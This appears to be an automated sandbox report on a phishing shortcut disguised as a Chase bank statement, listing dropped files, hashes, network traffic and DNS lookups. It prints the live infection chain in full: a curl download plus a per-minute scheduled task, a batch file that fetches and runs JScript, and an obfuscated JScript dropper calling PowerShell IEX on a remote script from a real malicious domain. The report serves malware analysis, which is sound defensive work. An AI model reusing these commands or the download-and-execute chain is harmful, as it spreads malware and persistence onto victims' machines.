                  Preview:var f1="Scr",f2="ing.Fi",f3="stemOb"..var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject");..var w1="WSc",w2="riPt",w4="eLl"..var wsh=w1+w2+".sH"+w4..var bbj=new ActiveXObject(wsh)..var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").AddressWidth==64?"SysWOW64":"System32"..var rd=bbj.ExpandEnvironmentStrings("%SYSTEMROOT%")+"\\"+fldr+"\\WindowsPowerShell\\v1.0\\powershell.exe"..if (WScript.ScriptName != "agent.js") {...var fs5="yFi"...try {...fso["Cop"+fs5+"le"](WScript.ScriptFullName, bbj.ExpandEnvironmentStrings("%programdata%")+"\\agent.js");...} catch (e) {}..}..var mtx_name="7zIDTSVL44SX";..var mtx_file = bbj.ExpandEnvironmentStrings("%temp%")+"\\"+mtx_name;..var fs1="leteFi"..var fs2="leExis"..try {...fso["De"+fs1+"le"](mtx_file);..} catch (e) {}..if (!fso["Fi"+fs2+"ts"](mtx_file))..{...bbj.Run(rd+" -command \"$env:paths = '" + mtx_name + "'; IEX(IWR -UseBasicParsing 'https://admiralpub.ca/wp-content/uploads/2017/agent1.ps1'); $f.SetValue($null, $true); IEX(IWR

                  C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat

                  Download File
                  Process:C:\Windows\System32\curl.exe
                  File Type:ASCII text, with no line terminators
                  Category:modified
                  Size (bytes):197
                  Entropy (8bit):5.149953539643581
                  Encrypted:false
                  SSDEEP:6:rz8GiyaAU1alAZIK8nKJIKy9N8CVu5gR6vN8H:X8BJx15xkjB805R7H
                  MD5:0332390C6D942762863689302B78C59A
                  SHA1:87B6E8A839BFF7A02D2B190999191557C6FA9B61
                  SHA-256:B119B68F050C3A5DDFC8D1B7F704BD57E8B6520FA2E04918BC6DCE7ED74E855F
                  SHA-512:34AD0899591ABFD812D950E586112B6DCF687371831834A13A6F03CFD38FEAEACE6E3322C772965E8B2D927E3DFB596324C08CF8967E47E88FF9B5ABF8C75543
                  Malicious:true
                  Preview:start /min powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf '%tmp%\EGLG6DJOY9K9.js'; schtasks /delete /tn %1 /f; wscript %tmp%\EGLG6DJOY9K9.js"

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ehs5zhc.dsd.psm1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b33eckjg.iyd.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bg3pbtwh.dsy.psm1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gb2rsywu.plq.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i0bkzy0a.aty.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mcjwrrpk.mku.psm1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6222
                  Entropy (8bit):3.708042013237483
                  Encrypted:false
                  SSDEEP:96:TzsnCzojkvhkvCCt2fHXXRGHpfHXXRnHK:TzsM42fHXCfHX4
                  MD5:B59C16E8FCB97FB60406026BF89118C7
                  SHA1:D26840F40EF81ED73B248A9980CC943229E674EC
                  SHA-256:2520D8D6E8C7092CE7BEE2261DD98B8A0E65AACEC9F99B9924A6BF3BBCD82E8C
                  SHA-512:0E9F728FF5D29C880EECE2A266BC99585BDD18D37B6B23533B2B6793AF3D38E838BF278151A774C22C4602E03D34829234C57A57489398B8DA1548D267894651
                  Malicious:false
                  Preview:...................................FL..................F.".. ...d......G...3...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.........2.......3.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl|Xs.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....|Xq...Roaming.@......DWSl|Xq.....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl|Xo.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl|Xo.....E.......................Y.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl|Xo.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl|Xo.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl|Xv.....q...........

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF4dac66.TMP (copy)

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6222
                  Entropy (8bit):3.708042013237483
                  Encrypted:false
                  SSDEEP:96:TzsnCzojkvhkvCCt2fHXXRGHpfHXXRnHK:TzsM42fHXCfHX4
                  MD5:B59C16E8FCB97FB60406026BF89118C7
                  SHA1:D26840F40EF81ED73B248A9980CC943229E674EC
                  SHA-256:2520D8D6E8C7092CE7BEE2261DD98B8A0E65AACEC9F99B9924A6BF3BBCD82E8C
                  SHA-512:0E9F728FF5D29C880EECE2A266BC99585BDD18D37B6B23533B2B6793AF3D38E838BF278151A774C22C4602E03D34829234C57A57489398B8DA1548D267894651
                  Malicious:false
                  Preview:...................................FL..................F.".. ...d......G...3...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.........2.......3.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl|Xs.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....|Xq...Roaming.@......DWSl|Xq.....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl|Xo.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl|Xo.....E.......................Y.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl|Xo.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl|Xo.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl|Xv.....q...........

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF4e9280.TMP (copy)

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6222
                  Entropy (8bit):3.708042013237483
                  Encrypted:false
                  SSDEEP:96:TzsnCzojkvhkvCCt2fHXXRGHpfHXXRnHK:TzsM42fHXCfHX4
                  MD5:B59C16E8FCB97FB60406026BF89118C7
                  SHA1:D26840F40EF81ED73B248A9980CC943229E674EC
                  SHA-256:2520D8D6E8C7092CE7BEE2261DD98B8A0E65AACEC9F99B9924A6BF3BBCD82E8C
                  SHA-512:0E9F728FF5D29C880EECE2A266BC99585BDD18D37B6B23533B2B6793AF3D38E838BF278151A774C22C4602E03D34829234C57A57489398B8DA1548D267894651
                  Malicious:false
                  Preview:...................................FL..................F.".. ...d......G...3...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.........2.......3.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl|Xs.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....|Xq...Roaming.@......DWSl|Xq.....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl|Xo.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl|Xo.....E.......................Y.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl|Xo.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl|Xo.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl|Xv.....q...........

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6K4PEVODYN5YNNE2QJM7.temp

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6222
                  Entropy (8bit):3.7086549122235817
                  Encrypted:false
                  SSDEEP:96:SHsnCzjjkvhkvCCt2fHXXRnHpfHXXRnHK:SHsMz2fHXjfHX4
                  MD5:5CF3978A67773AC7FF3D2857CD66A58C
                  SHA1:19121A71FEC52032536CE01B34783DF54DAC6449
                  SHA-256:E6B0595B5E8C356DA13257D1C8CE405FDC03E9285DAF836464E918A66D5EF9B2
                  SHA-512:F38E5C3BA16A858F85131BA5D3788664D3FE2FBA7ABC34AB693E4784EE1A62A1F674C29D9453CCA8BA30D79F6EDC3411EE2E95333DE29F535FC968204308F9CC
                  Malicious:false
                  Preview:...................................FL..................F.".. ...d......O...3...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.........2...."./3.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl|Xs.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....|Xq...Roaming.@......DWSl|Xq.....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl|Xo.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl|Xo.....E.......................Y.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl|Xo.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl|Xo.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSl|Xv.....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl|Xv.....q...........

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GWV6LD4PZW7H8D7URH4J.temp

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6222
                  Entropy (8bit):3.7082869541964114
                  Encrypted:false
                  SSDEEP:96:S2snCzjjkvhkvCCt2fHXXRnHpfHXXRnHK:S2sMz2fHXjfHX4
                  MD5:CC015BD28884D62945E86E4A9026384C
                  SHA1:3A9C5782B2EABC39A01A046696243CB31FCC2A9B
                  SHA-256:10CE18C3597DCAB6BAF12719CACC926BD1743F0DC544E57CFB54EF9ABD4B7D77
                  SHA-512:0D4570EACE6FCEE836865E6BA3B2BC6703BBE091024EC2DD59449002AA046A1F396B5BCDC0A3F422D6B597A058C90A397C5CBE9298FC07B2B2427BFE98E45F79
                  Malicious:false
                  Preview:...................................FL..................F.".. ...d......O...3...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.........2...._..3.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl|Xs.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....|Xq...Roaming.@......DWSl|Xq.....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl|Xo.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl|Xo.....E.......................Y.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl|Xo.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl|Xo.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSl|Xv.....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl|Xv.....q...........

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PY5XP514LH93HD6U40HK.temp

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6222
                  Entropy (8bit):3.708042013237483
                  Encrypted:false
                  SSDEEP:96:TzsnCzojkvhkvCCt2fHXXRGHpfHXXRnHK:TzsM42fHXCfHX4
                  MD5:B59C16E8FCB97FB60406026BF89118C7
                  SHA1:D26840F40EF81ED73B248A9980CC943229E674EC
                  SHA-256:2520D8D6E8C7092CE7BEE2261DD98B8A0E65AACEC9F99B9924A6BF3BBCD82E8C
                  SHA-512:0E9F728FF5D29C880EECE2A266BC99585BDD18D37B6B23533B2B6793AF3D38E838BF278151A774C22C4602E03D34829234C57A57489398B8DA1548D267894651
                  Malicious:false
                  Preview:...................................FL..................F.".. ...d......G...3...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.........2.......3.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl|Xs.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....|Xq...Roaming.@......DWSl|Xq.....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl|Xo.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl|Xo.....E.......................Y.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl|Xo.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl|Xo.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl|Xv.....q...........

                  \Device\ConDrv

                  Download File
                  Process:C:\Windows\System32\curl.exe
                  File Type:ASCII text, with CR, LF line terminators
                  Category:dropped
                  Size (bytes):399
                  Entropy (8bit):3.053345478600629
                  Encrypted:false
                  SSDEEP:6:I2swj2SAykymUeg/8Uni1qSgOgcdSgOgcIZCooSgOgOT:Vz6ykymUexb1U9cL9cIZCD9G
                  MD5:8F756A184F35A22876E005A67091AD01
                  SHA1:C161992CEE76EF3C35F471BD4AC0DB8399F6285B
                  SHA-256:908C219EF79F1D31ED64700F94EEEE7321D2301E6B96D27A62819A128E2D13F3
                  SHA-512:DAD8E225CE900EFFC203EB78CCACE2206C74C0028707E6C0B38211C162390017E489070351912E67F45718D99E799A9913B224755B79546AF706C85DED382642
                  Malicious:false
                  Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0.100 197 0 197 0 0 276 0 --:--:-- --:--:-- --:--:-- 276..

                  Static File Info

                  General

                  File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=13, Archive, ctime=Wed Oct 6 12:52:37 2021, mtime=Wed Mar 27 01:07:39 2024, atime=Wed Oct 6 12:52:37 2021, length=289792, window=hidenormalshowminimized
                  Entropy (8bit):2.9313220021387747
                  TrID:
                  • Windows Shortcut (20020/1) 100.00%
                  File name:chasebank_statement_mar.lnk
                  File size:3'017 bytes
                  MD5:2ac1bf6ce61112134a087ce30d48cd6b
                  SHA1:3b78b7507e4a1fe63ce51a5a2b19de8487b199f1
                  SHA256:b54eb35a701e5bba8f1df00f4e21e2bd4637ce3ce490560d203feab0dc84ff06
                  SHA512:954dbf6d915fc68d399472f840d89c978fdc6a58b5406ccc694b4b97f123298bc4a05ab119ccb539d7d2ce7c535543ed7974617bdabba7b5417777690ba179bd
                  SSDEEP:24:8a6JlQx64fAA2P0+/o4Jq2BsB5NgKcgv8/dd+IAI0OXuHY8tXmH:8fWoD80qfBJY/dkIPXuHx8
                  TLSH:5151D0243FED0B30D3F6497614B6A621857B799AE975DB1C00D4868C4826E10AC39F7F
                  File Content Preview:L..................F.B.. ...Pu.l......i.....Pu.l.....l......................5....P.O. .:i.....+00.../C:\...................V.1.....iW.b..Windows.@........OwH{X......&.....................lf6.W.i.n.d.o.w.s.....Z.1.....zXMT..System32..B........OwH{X........

                  File Icon

                  Icon Hash:74f4f4dcece9e9ed

                  Static Windows Shortcut Info

                  General

                  Relative Path:..\..\..\..\..\..\..\..\Windows\System32\cmd.exe
                  Command Line Argument:/c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'%tmp%\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1
                  Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Mar 28, 2024 18:11:41.935695887 CET49706443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:11:41.935730934 CET44349706103.26.141.28192.168.2.5
                  Mar 28, 2024 18:11:41.935801983 CET49706443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:11:41.946871042 CET49706443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:11:41.946887970 CET44349706103.26.141.28192.168.2.5
                  Mar 28, 2024 18:11:42.304347992 CET44349706103.26.141.28192.168.2.5
                  Mar 28, 2024 18:11:42.304418087 CET49706443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:11:42.306945086 CET49706443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:11:42.306953907 CET44349706103.26.141.28192.168.2.5
                  Mar 28, 2024 18:11:42.307199001 CET44349706103.26.141.28192.168.2.5
                  Mar 28, 2024 18:11:42.310619116 CET49706443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:11:42.352238894 CET44349706103.26.141.28192.168.2.5
                  Mar 28, 2024 18:11:42.493614912 CET44349706103.26.141.28192.168.2.5
                  Mar 28, 2024 18:11:42.502674103 CET44349706103.26.141.28192.168.2.5
                  Mar 28, 2024 18:11:42.502734900 CET49706443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:11:42.510524988 CET49706443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:11:42.510538101 CET44349706103.26.141.28192.168.2.5
                  Mar 28, 2024 18:11:47.156785011 CET49707443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:11:47.156812906 CET44349707103.26.141.28192.168.2.5
                  Mar 28, 2024 18:11:47.156878948 CET49707443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:11:47.167570114 CET49707443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:11:47.167582989 CET44349707103.26.141.28192.168.2.5
                  Mar 28, 2024 18:11:47.395399094 CET44349707103.26.141.28192.168.2.5
                  Mar 28, 2024 18:11:47.395468950 CET49707443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:11:47.398211956 CET49707443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:11:47.398221016 CET44349707103.26.141.28192.168.2.5
                  Mar 28, 2024 18:11:47.398453951 CET44349707103.26.141.28192.168.2.5
                  Mar 28, 2024 18:11:47.405333996 CET49707443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:11:47.452244043 CET44349707103.26.141.28192.168.2.5
                  Mar 28, 2024 18:11:47.726317883 CET44349707103.26.141.28192.168.2.5
                  Mar 28, 2024 18:11:47.734868050 CET44349707103.26.141.28192.168.2.5
                  Mar 28, 2024 18:11:47.735117912 CET49707443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:11:47.758186102 CET49707443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:12:03.665699005 CET49716443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:12:03.665724039 CET44349716103.26.141.28192.168.2.5
                  Mar 28, 2024 18:12:03.665791988 CET49716443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:12:03.669879913 CET49716443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:12:03.669891119 CET44349716103.26.141.28192.168.2.5
                  Mar 28, 2024 18:12:03.898551941 CET44349716103.26.141.28192.168.2.5
                  Mar 28, 2024 18:12:03.898633003 CET49716443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:12:03.903228998 CET49716443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:12:03.903237104 CET44349716103.26.141.28192.168.2.5
                  Mar 28, 2024 18:12:03.903469086 CET44349716103.26.141.28192.168.2.5
                  Mar 28, 2024 18:12:03.909478903 CET49716443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:12:03.952243090 CET44349716103.26.141.28192.168.2.5
                  Mar 28, 2024 18:12:04.228037119 CET44349716103.26.141.28192.168.2.5
                  Mar 28, 2024 18:12:04.235511065 CET44349716103.26.141.28192.168.2.5
                  Mar 28, 2024 18:12:04.235578060 CET49716443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:12:04.245589018 CET49716443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:13:02.670890093 CET49719443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:13:02.670924902 CET44349719103.26.141.28192.168.2.5
                  Mar 28, 2024 18:13:02.670981884 CET49719443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:13:02.674324036 CET49719443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:13:02.674338102 CET44349719103.26.141.28192.168.2.5
                  Mar 28, 2024 18:13:02.902317047 CET44349719103.26.141.28192.168.2.5
                  Mar 28, 2024 18:13:02.902373075 CET49719443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:13:02.906233072 CET49719443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:13:02.906239986 CET44349719103.26.141.28192.168.2.5
                  Mar 28, 2024 18:13:02.906481028 CET44349719103.26.141.28192.168.2.5
                  Mar 28, 2024 18:13:02.917754889 CET49719443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:13:02.960232973 CET44349719103.26.141.28192.168.2.5
                  Mar 28, 2024 18:13:03.245589018 CET44349719103.26.141.28192.168.2.5
                  Mar 28, 2024 18:13:03.253700018 CET44349719103.26.141.28192.168.2.5
                  Mar 28, 2024 18:13:03.257800102 CET49719443192.168.2.5103.26.141.28
                  Mar 28, 2024 18:13:03.261204004 CET49719443192.168.2.5103.26.141.28

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Mar 28, 2024 18:11:41.800190926 CET5225653192.168.2.51.1.1.1
                  Mar 28, 2024 18:11:41.930814981 CET53522561.1.1.1192.168.2.5

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Mar 28, 2024 18:11:41.800190926 CET192.168.2.51.1.1.10x4648Standard query (0)admiralpub.caA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Mar 28, 2024 18:11:41.930814981 CET1.1.1.1192.168.2.50x4648No error (0)admiralpub.ca103.26.141.28A (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • admiralpub.ca

                  HTTPS Proxied Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.549706103.26.141.284436024C:\Windows\System32\curl.exe
                  TimestampBytes transferredDirectionData
                  2024-03-28 17:11:42 UTC115OUTGET /wp-content/uploads/2017/olympiadic.php HTTP/1.1
                  Host: admiralpub.ca
                  User-Agent: curl/7.83.1
                  Accept: */*
                  2024-03-28 17:11:42 UTC208INHTTP/1.1 200 OK
                  Date: Thu, 28 Mar 2024 17:11:42 GMT
                  Server: Apache
                  Upgrade: h2,h2c
                  Connection: Upgrade, close
